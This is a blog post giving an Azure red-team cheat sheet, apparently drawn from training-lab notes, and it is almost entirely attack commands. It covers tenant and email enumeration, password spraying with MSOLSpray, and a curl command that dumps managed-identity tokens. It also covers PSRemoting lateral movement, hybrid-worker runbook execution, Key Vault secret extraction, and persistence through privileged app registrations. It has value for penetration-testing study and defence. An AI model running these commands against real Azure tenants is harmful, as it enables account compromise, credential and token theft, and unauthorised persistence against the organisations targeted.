Azure Redteam Cheatsheet

I. Reconnaissance (external)

Find the subdomain of the target

Using microBurst

. \Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose

enum email: -f emails.txt -o validemails.txt

II. Reconnaissance (internal)

Using RoadTool

 roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui

Using StormSpotter

python ssbackend.pyz
quasar.cmd serve -p 9091 --history

Using Bloodhound, Azurehound

. C:\AzAD\Tools\AzureHound\AzureHound.ps1
PS C:\AzAD\Tools> Invoke-AzureHound -Verbose

III. Initial attack

Brute force

PS Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose

Illicit Consent Grant attack.


IV. Lateral movement

Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code:


system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');


Check Deployments

Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>

Save deployment template

Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>

VM interaction:

access the VM using PSRemoting

$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess

Transfer file:

Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ –Verbose

Excute a command:

Invoke-Command -Session $sess -ScriptBlock{ls C:\Users\}

Using hybridworker

List Automation Hybrid Wordker Group

Get-AzAutomationHybridWorkerGroup -AutomationAccountName <> -ResourceGroupName

Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose

Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Dump PRT

Using PRT in chrome

Abuse Dynamic group

Abuse proxy application

Check azure connect, authentication type


Cloud to On-prem:

abuse PTA,

obtain PRT cookie


Global Administrator or Intune Administrator role can execute
PowerShell scripts on an enrolled Windows device

On-prem to Cloud:

abuse PHS

V. Persistence

Add a new application that has high permissions and then use that for persistence

Useful command:


az login -u -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("", $passwd)
Connect-AzureAD -Credential $creds


$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
Invoke-AzureHound -Verbose

Get all users

Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName  => only get only UPNs

Show GAs

Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember

List all custom directory roles:

Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName

List resource (AzAD)


Get all the role assignments for the test user

Get-AzRoleAssignment -SignInName
Get-AzRoleAssignment -Scope <Scope>

Check the definition of this role

Get-AzRoleDefinition -Name <Role_name>

List all the VMs where the current user has at least the Reader role

Get-AzVM | fl
az vm list

List all App Services. We filter on the bases of ‘Kind’ proper otherwise both appservices and function
apps are listed

Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list (list web app service)
az webapp list --query "[].[name]" -o table (List only the names of app services)

To list Function Apps


list storage accounts

Get-AzStorageAccount | fl
az storage account list

is the readable keyvaults for the current user

az keyvault list
Get-AzKeyVaultSecret -VaultName
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Container_name> –AsPlainText

Check if there is a user logged-in to az cli on that machine

az ad signed-in-user show

Check if there is a public IP address attached to the VM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_name> | select -ExpandProperty NetworkProfile

Get more details about the network interface attached to the VM using the below command

Get-AzNetworkInterface -Name <VM_interface>

Get the public IP address attached to the VM

Get-AzPublicIpAddress -Name <IP_name>

Get AzVM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *

Get information of the group and list principles

Get-AzADGroup -DisplayName <Group_name>

Enumerate the service principals in Azure AD and check the service principal that the AppID xx belong to

 Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl



Check if any extensions is already installed

Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>

Run powershell on the VM from the powershell file

Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose

Published by Nhat Truong


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: